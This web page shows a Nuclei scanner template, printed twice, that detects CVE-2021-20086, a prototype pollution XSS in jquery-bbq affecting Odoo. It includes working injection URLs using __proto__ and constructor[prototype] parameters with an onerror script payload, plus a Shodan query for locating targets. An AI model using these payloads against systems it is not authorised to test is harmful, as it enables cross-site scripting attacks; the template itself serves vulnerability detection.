Odoo Apps - Cross-Site Scripting via Prototype Pollution

CVE-2021-20086

Verified

Description

jquery-bbq 1.2.1 contains a prototype pollution caused by improperly controlled modification of object prototype attributes, letting malicious users inject properties into Object.prototype, exploit requires malicious user interaction.

Severity

High

CVSS Score

8.8

Exploit Probability

30%

Affected Product

jquery-bbq

Published Date

October 8, 2025

Template Author

1337rokudenashi

CVE-2021-20086.yaml

id: CVE-2021-20086

info:
  name: Odoo Apps - Cross-Site Scripting via Prototype Pollution
  author: 1337rokudenashi
  severity: high
  description: |
    jquery-bbq 1.2.1 contains a prototype pollution caused by improperly controlled modification of object prototype attributes, letting malicious users inject properties into Object.prototype, exploit requires malicious user interaction.
  impact: |
    Attackers can modify Object.prototype, leading to potential security issues like property overwrites and application behavior manipulation.
  remediation: |
    Update to the latest version of jquery-bbq that addresses this vulnerability or apply patches to prevent prototype pollution.
  reference:
    - https://www.tenable.com/security/research/tra-2022-10
    - https://nvd.nist.gov/vuln/detail/CVE-2021-20086
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2021-20086
    cwe-id: CWE-1321
    epss-score: 0.30086
    epss-percentile: 0.96503
    cpe: cpe:2.3:a:jquery-bbq_project:jquery-bbq:1.2.1:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: jquery-bbq_project
    product: jquery-bbq
    shodan-query: html:"Odoo"
  tags: cve,cve2021,odoo,xss,proto,jquery,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/?__proto__%5Bcontext%5D=%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E&__proto__%5Bjquery%5D=x"
      - "{{BaseURL}}/?constructor%5Bprototype%5D%5Bcontext%5D=%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E&constructor%5Bprototype%5D%5Bjquery%5D=x"

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - '!contains(body, "debug:")'
          - 'contains_all(body, "alert(document.domain)","var odoo =")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a0047304502207174e8ddd4ceedc32a4658d1521f0838db00181f43805368b9bb4b59ea77feaa022100fa9f0d16a86fd83fa97087cae22f19753411dd86d6efeb2b64f3084480ea4cbd:922c64590222798bb761d5b6d8e72950

8.8Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE ID:

cve-2021-20086

CWE ID:

cwe-1321

References

https://www.tenable.com/security/research/tra-2022-10 https://nvd.nist.gov/vuln/detail/CVE-2021-20086

Remediation Steps

Update to the latest version of jquery-bbq that addresses this vulnerability or apply patches to prevent prototype pollution.

id: CVE-2021-20086

info:
  name: Odoo Apps - Cross-Site Scripting via Prototype Pollution
  author: 1337rokudenashi
  severity: high
  description: |
    jquery-bbq 1.2.1 contains a prototype pollution caused by improperly controlled modification of object prototype attributes, letting malicious users inject properties into Object.prototype, exploit requires malicious user interaction.
  impact: |
    Attackers can modify Object.prototype, leading to potential security issues like property overwrites and application behavior manipulation.
  remediation: |
    Update to the latest version of jquery-bbq that addresses this vulnerability or apply patches to prevent prototype pollution.
  reference:
    - https://www.tenable.com/security/research/tra-2022-10
    - https://nvd.nist.gov/vuln/detail/CVE-2021-20086
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2021-20086
    cwe-id: CWE-1321
    epss-score: 0.30086
    epss-percentile: 0.96503
    cpe: cpe:2.3:a:jquery-bbq_project:jquery-bbq:1.2.1:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: jquery-bbq_project
    product: jquery-bbq
    shodan-query: html:"Odoo"
  tags: cve,cve2021,odoo,xss,proto,jquery,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/?__proto__%5Bcontext%5D=%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E&__proto__%5Bjquery%5D=x"
      - "{{BaseURL}}/?constructor%5Bprototype%5D%5Bcontext%5D=%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E&constructor%5Bprototype%5D%5Bjquery%5D=x"

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - '!contains(body, "debug:")'
          - 'contains_all(body, "alert(document.domain)","var odoo =")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a0047304502207174e8ddd4ceedc32a4658d1521f0838db00181f43805368b9bb4b59ea77feaa022100fa9f0d16a86fd83fa97087cae22f19753411dd86d6efeb2b64f3084480ea4cbd:922c64590222798bb761d5b6d8e72950

Odoo Apps - Cross-Site Scripting via Prototype Pollution

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

Odoo Apps - Cross-Site Scripting via Prototype Pollution

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps